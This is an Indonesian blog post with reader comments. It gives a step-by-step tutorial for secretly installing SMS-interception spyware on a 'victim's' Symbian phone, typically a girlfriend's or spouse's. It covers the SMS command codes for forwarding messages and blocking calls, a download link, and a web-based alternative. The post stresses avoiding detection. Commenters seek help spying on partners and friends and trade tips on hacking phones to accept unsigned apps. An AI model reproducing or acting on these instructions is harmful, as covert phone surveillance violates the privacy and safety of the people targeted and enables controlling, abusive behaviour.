Melihat isi sms orang lain atau sadap sms (request)

May212011
Salah satu pengunjung blog ini menanyakan tentang penyadap sms,yadah deh aku posting saja buat yang sudah tau boleh abaikan postingan ini.

Ok,langsung aja,
Aplikasi ini di gunakan untuk menyadap sms masuk dan keluar bahkan mampu momblokir telepon masuk/keluar untuk korban tanpa di ketahui..

Aplikasi ini, biasa digunakan untuk menyadap orang atau pacar yang bandel yg suka bo'ong misalnyabiggrin

let's begin.... !

Syarat Umum :

1. HP korban harus berbasis symbian s60 v3 / s60 v5

Lg: KS10 Joy, KT610
Motorola: Z10 Rizr, Z8 Rizr Nokia: 3250, 5228,5230, 5232, 5233, 5235 Comes With Music,5250, 5320 XpressMusic, 5500 Sport,5530 XpressMusic, 5630 Xpress Music, 5700 XpressMusic, 5730 XpressMusic, 5800 XpressMusic, 6110 Navigator, 6120 Classic, 6121 Classic, 6122c, 6124 Classic, 6210 Navigator, 6220 Classic, 6290, 6650 Fold, 6700 Slide, 6720 Classic, 6730 Classic, 6788, 6790 Mako, C5, C6, E5, E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E73 Mode, E75, E90, N71, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, N97 Mini, X5-01, X6 Samsung: GT I7110, GT I8510 Innov8, GT I8910 Omnia, SGH G810, SGH I400, SGH I450, SGH I455, SGH I550, SGH I560, SGH L870 Sony-Ericsson: G700, G900, M600, M608, P1i, P990, U1 Satio, U5 Vivaz, U8 Kanna, W950, W958, W960 ..etc

klo hp korban bukan s60 diatas,misalkan hp china.satu-satunya cara adalah hp symbian mu yang harus disadap.

kemudian tukar pake sajah namanya pacar pasti mau apalagi hp mu lbih kren gampangkanbiggrin

kalau untuk penyadap hp jadul pun bisa.

ok..lanjut

2. HP tersebut tentunya harus bisa menginstall
aplikasi unsigned.

Langkah Instalasi :

Siapkan HP korban dan HP kita

install aplikasinya (bisa didownload dibagian bawah postingan ini) pada ponsel korban tunggu sampai proses instalasi selesai.

Tp ingat !! jangan sampe ketahuan. kalo ketauan mampuzZ decH.. :.P

Ketiga, Kirim sms ke nomor HP korban dengan format :

Set (spasi) admin (spasi) nomor hp kita.

Lihat gambar.



pengiriman sms diatas tidak akan nampak di ponsel korban,hanya akan ada efek getaran saat tlp dlm modus normal.

No yang dibawah pada gambar diatas adalah no.yang dipakai untuk menyadap,sedangkan yang diatas no yg akan disadap.

Dalam hal ini kita ibaratkan pacar kamu sebagai contoh targetnya. nah setelah sms di atas sudah kita kirim sebaiknya kamu tes dengan cara sms dia.

Bebas mau pake hp bokap, nyokap, atau teman kamu yang beda nomer dan lihat hasilnya, sekedar untuk memastikan aplikasi ini berjalan baik.

Setelah selesai,lihat gambar berikut ini.


Dimana simbol Fr : telah mendapat sms dari suatu no.lain (target menerima sms)
*pacar kamu menerima sms

sedangkan gambar yang dibawah ini, Dimana To: sms yang dikirimkan oleh target ke no.lain
*sms yg di kirim oleh pacar kamu


Kode-kode printah yang lain:

- off :untuk sementara menghentikan penyadapan

- on :untuk menghidupkan kembali penyadapan

- add sender +62813xxx :untuk menyadap ke nomor tertentu saja.

- add :untuk kembali menyadap semua nomor lagi

- block on :untuk memblokir semua aktifitas telepon masuk dan keluar

- block off :untuk mematikan blokir telepon yg diatas.

Bila ingin mengganti no penyadap tinggal ulangi kirim set admin lagi,seperti diatas.

Dah ahh cuma gitu doank,resiko ditanggung diri yaWh,law ketauan jangan bawa-bawa aku yaabiggrin

beban pulsa sms ditanggung korban.

Link :

( APLIKASINYA DISINI )


Oh,yaa slain cara diatas sebenarnya beberapa aplikasi lain,nah yang ini yang banyak di share.

selain aplikasi kalian bisa Menyadap sms semua lewat Internet juga. hanya dengan mendaftar ke http:// www.bloove.com.

trus download file agent.sisx s60 pasang di hp yang akan di sadap.

Tapi, Udah lah dengan cara diataspun sudah cukup.gak usah di bahas lagi ya capek -razz

smoga bermanfaat. ..!
Bagikan ke Facebook Bagikan ke Twitter

Komentar

84 tanggapan untuk "Melihat isi sms orang lain atau sadap sms (request)"

sedenx pada 14:05, 21-Mei-11

gokil tp ane kasihan jg a5 korban mrgreen

Tyan pada 14:13, 21-Mei-11

tq brow c0ment'y,klw dket ane kasiH g0pek dech.

Iya breX ksian, jan9an ditirumrgreen

Ibenk Msv pada 14:31, 21-Mei-11

Widih sayang gw kaga punya cewe hehehesmile

Tyan pada 14:49, 21-Mei-11

jiah,mrgreen

Ykubnay pada 15:03, 21-Mei-11

nyimak kang.. Aplikasinya hebat bnget

Jongos pada 15:34, 21-Mei-11

Ikut nyemak BOS!lg mls bngt ne ngapa2in

Tyan pada 17:50, 21-Mei-11

Ikut Nyimak ahh..
Hehe..

Tq sob..

Ainudin pada 20:29, 21-Mei-11

nyimak ja kang, gk bz coba confused

Tyan pada 20:45, 21-Mei-11

yapz,sama2 wA slahkan dicoba razz
jiah..

PANDA pada 21:55, 21-Mei-11

postingannya warna warni...
Bisa nyadap percakapan presiden juga nih...

Tukeran blogroll dan follownya ya gan..

#Gedung putih juga

Panda.Mywapblog.Com

rons pada 17:26, 22-Mei-11

aduh ane jd ktngglan nie,krain l0m p0sting,,
tp ane hny bsa ngucpn trma ksh z wat smuany,lngsung z ach sd0t aplikasi'y,x lg mkzh y.

Tyan pada 17:52, 22-Mei-11

iya rONs sama-samarazz

khesia pada 14:45, 24-Mei-11

hp tipe android bs nggak neh

Tyan pada 16:03, 24-Mei-11

gk bisa.

Tyan pada 13:34, 10-Jun-11

tq mrbiggrin

b093L pada 01:49, 16-Jun-11

GAN,,,,,,HP apa aja tu yg bisa,,,n70 bsa ngk,,,,,soalnya,,,ngk bsa di instal d hp gw

chubby pada 08:32, 23-Jun-11

dih,pcr pke nokia x3-02
mana bisa diparalel de sad

Tyan pada 02:34, 15-Agu-11

ponsel target harus keadaan hacked biar bisa instal aplikasi unsigned, n70 s60v3 jg sob..

winda pada 23:20, 18-Sep-11

gw gk ngerti nh

Chan Uciha Blog pada 10:07, 05-Okt-11

Salam kenal ja,.....!

vindi pada 11:56, 10-Okt-11

087823526884

iwan pada 19:33, 24-Okt-11

bos,knp y pas di instl ga ada icon aplksinya,dan bsar file cma 75kb?

Tyan pada 17:54, 25-Okt-11

Donload ulang .. itu filenya 449kb sob, mungkin corrupt saat kamu mendownloadnya..

tri pada 17:06, 27-Okt-11

kalo bwt BB bold 9000 ada ga bro...thanks

Tyan pada 11:11, 29-Okt-11

ane gk pnya bro..

gufron pada 00:59, 13-Des-11

ha ha ha keren bos,bisa nyadap kakek ane yg doyan sms an ne lol

eki cool pada 14:18, 15-Des-11

ada manfaatnya jg nih.....bagi yg sk slingkuh msti lbih kreatif lg nih.mudah2an aja qt bkn jd korban perselingkuhan

Tyan pada 16:19, 17-Des-11

ada lg bro slain aplikasi ini, syang nya masih trial sih..

tangkas pada 10:37, 26-Jan-12

mas kok pas mau instal sertifikat kadaluarsa hp saya e63,,
mohon bantuan brow...

Tyan pada 15:05, 26-Jan-12

harus di hack dulu ponselna..

koko pada 18:49, 15-Peb-12

klo hp sya hp cina trs yg lawannya e63 bs gk boz

Tyan pada 23:19, 15-Peb-12

@koko: lawan apa gan, emang mau tarung bukand.. hehe..mrgreen

mksudnya E63 nya yg di sadap, Pake hp china gan, klo bgitu bisa..

adhy pada 18:37, 19-Peb-12

gan,,nanya nieh gw gaptek abizz nieh klo HP di hack maksud nya di apaan tuhh gan...???kok di Hp bini gw ga bisa di installl gan..??HP nye E71

Rahmat pada 15:31, 22-Peb-12

Aplikasi ini bisa sadap lebih dari 1 no ngga gan?

Tyan pada 18:53, 22-Peb-12

bisa, ya pokonya yg mau di sadap hrus di instal app ini gan,

Tyan pada 18:56, 22-Peb-12

@adhy : cara hack hp search di google bnyak gan..

Rahmat pada 20:10, 23-Peb-12

Tyan : bermanfaat banget nih sob aplikasinya. biggrin
Hihihi gue jadi bisa tau aib temen2 gue.. Tapi gan cara nonaktifin sadap nya itu ketik set off (no hp kita) terus kirim ke no yg kita sadap gan. Bener ngga th?

Ardi : hack yg gampang pake aplikasi mobile security, xplore, rompatcher, dan patch2 yg akan di karantina, cara ini paling gampang karna ngga pake sertifikat n cert. Lebih jelas loe search aja di om google

puput pada 08:35, 24-Peb-12

koq gue gk bisa diinstal ya? padahal hp gue 5320 express music..bantuin donk?

Danudan pada 23:32, 20-Mar-12

Klw beda no hp msh bisakan gan?..

animous pada 12:25, 06-Apr-12

gankok expired certivicate ya ???????????

animous pada 12:25, 06-Apr-12

gan kok expired certivicate ya ???????????

anto pada 10:37, 21-Apr-12

kalau hpnya sama-sama jadul gmna broww??? kyak hp samsung champ c3303i

agusriyantoo77 pada 09:16, 22-Apr-12

pulsa di tanggung korban trz jumlah pulza,y brpa ?

faris168 pada 21:00, 27-Mei-12

off :untuk sementara menghentikan penyadapan...tu cara nya gimana / format nya

asep pada 08:05, 20-Jul-12

klo buat hp sony ericsson type J108i n hp nokia X2-02 gimna cranya kang?

abu pada 00:16, 08-Okt-12

downlodnya susah gan,gmana nie cranya

mazter sadap hp pada 09:21, 15-Okt-12

sms monitor.... jaman gini wes kuno za biggrin

ah... emang lucu sama orang2 yg gaptek.hahaha

mending sadap pke alat tempur..

Dhy pada 15:34, 01-Nov-12

Gank, kalo hp korban Nokia X3, tyuz HPq sonyericsson k800i.
Bsa gk yach?

licek pada 12:27, 04-Des-12

kalo off, gimana?
itu d sent item hapenya muncul ga kalo kesadap?

Maiwa Sharing pada 18:03, 06-Des-12

mohon ma'af semuanya, karna
komentar kalian blm smpat ter bls
semua,, Untuk yg menanyakan Cara
Melewati Adf.ly lwt OP
eramini berikut caranya..

Ketika udah masuk di adf.ly tekan
#1 pada operamini, setelah itu
langsung paste atau tempelkan
script dibawah ini :

javascript:

selesai, udah itu klik skip ads..
Kalau blm muncul skip ads nya ulangi terus.

rahmah pada 12:38, 04-Jan-13

hp aku nokia 5233, truz mau menyadap hp pcr aku samsung galaxy bza gak ..
Truz gmn cra'x ..

Maiwa Sharing pada 04:44, 05-Jan-13

wah gk bisa sob, kecuali hp nokia 5233 yg di sadap, baru itu bisa ..

Software ini gk support bwt hp java.

abdul jabar pada 12:18, 16-Jan-13

maaf brad klo samsung champ gt-c3303i bisa di sadap ga?

Maiwa Sharing pada 17:18, 16-Jan-13

@abdul jabar :ma"af sob gak bisa, itu soal'x hp java..

ada pada 00:23, 22-Jan-13

Kalau untk malaysia mcm mane

Ozy pada 20:24, 23-Jan-13

Boz ko sush downldnya

Maiwa Sharing pada 13:57, 25-Jan-13

ada@ : sama saja Paling cuma beda kode negara saja..

Ozy@ : tunggu hitungan detik dari adf.ly, lalu tinggal klik skip ads..

Supianineo pada 11:41, 01-Apr-13

mantab gan aku bisa kontrol sms dia

Maiwa Sharing pada 14:41, 21-Apr-13

@Supianineo: wah mantap gan, cwenya kyk'y cantik nih jd takut kehilangan ..
Hehee

ok, thanks gan..

cici ekawati pada 09:18, 28-Apr-13

wowwww,,asYik tuH,,
bisa2 ktaHuan hoho

Maiwa Sharing pada 14:18, 28-Apr-13

@cici ekawati: ahh bisa saja biggrin
thanks udh brkunjung..

rina pada 18:12, 12-Mei-13

Klu tnpa mnggunakan hp korban bisa gak yaa??:/

rina pada 18:14, 12-Mei-13

Klu tnpa mnggunakan hp korban bisa gak ya??

Maiwa Sharing pada 14:09, 15-Mei-13

maksudnya ?
iia asal di instal di hp dianya biggrin

ariesgranat pada 11:06, 16-Mei-13

Kalo sadap hp jadul bisa gak

Virginia pada 23:55, 22-Mei-13

Hp aku nokia 6500 slide mau nyadap nokia X2 02,bisa gak?

Darianto pada 23:35, 26-Mei-13

Klq hp aq kenak sadap gimana cara atasi'a bos,,

djamal pada 09:44, 02-Jun-13

klw hp yg tipe X2-01 bsa nggak..??

aden pada 15:40, 02-Jun-13

disini katanya ada postingan membahana mrgreen ?? Owh postingana agan maiwa tow ??.. Nyimak ajj dh gan ,, ehh gg dink.. rolleyes ane comot dah , mau ane gunain buat bininya orang nih..
Ditunggu kunbalnya gan biggrin
http://indosymbian.heck.in/

Deborah pada 02:16, 29-Jul-13

hp pacarku nokia 6500 bisa disadap ga yah??

Maz yAi Ariy sAnMoed pada 09:19, 08-Agu-13

aplikasinya gx bisa di pasang file rusak n70e

ryan pada 06:55, 20-Agu-13

hp korban saya E63,tpi punyaku ipe biasa,bole ngga??

jadul pada 10:24, 28-Agu-13

gak bisa ganti admin bos... gmana nih

helmy pada 13:37, 30-Agu-13

gan udah bisa tadi pas di ganti nomer adminya jadi ga bisa lagi ya gimana?

Kalo cara uninstall nya gimana

anggara pada 14:34, 07-Sep-13

kox aplikasi nya gx ada !?

tirta pada 02:21, 10-Sep-13

sob gmanane ni ane gak bisa downloadnya

adi pada 02:32, 10-Sep-13

min kok gak bisa di instal si?

AIKO pada 23:32, 17-Sep-13

Cemana cara mendownload aplikasi nya min ?
Coba yg lengkap penjelasannya oke,min.

dudung pada 23:37, 17-Sep-13

Gimana caranya download aplikasi Nya Miin ... ?

fazha pada 17:39, 23-Sep-13

tolong dong jelasin tentang biayanya sad
saya belum mengerti tentang biaya nya ?

kalau bisa sms saya ke nomor 085262608221
terima kasih ya admin

ari pada 22:20, 03-Okt-13

gan kalo dari bb gemini os5 bisa gak

ari pada 22:22, 03-Okt-13

kalo bisa kasi tau step by step caranya dong...apalagi kalo bisa liat dia bbm ma sapa aja...mbantu banget nich aplikasi....terima kasih n salam kenal.

eza pada 21:09, 04-Des-13

gan,,,gmna ne ane pke yg 123571 dri xl tu,,,vi plsa korban di embat terus,,,bangkrut dounk kita

Maiwa Sharing pada 03:11, 25-Jan-14

@ All : ane tidak bisa jelaskan satu2 dr pertanyaan kalian, haruskah ane buat video tutorialnya ???

arrow

Langganan komentar: [RSS] [Atom]

Komentar Baru

[Masuk]
Nama:

Komentar:
(Beberapa Tag BBCode diperbolehkan)

Kode Keamanan:
Aktifkan Gambar


 
Kembali ke Atas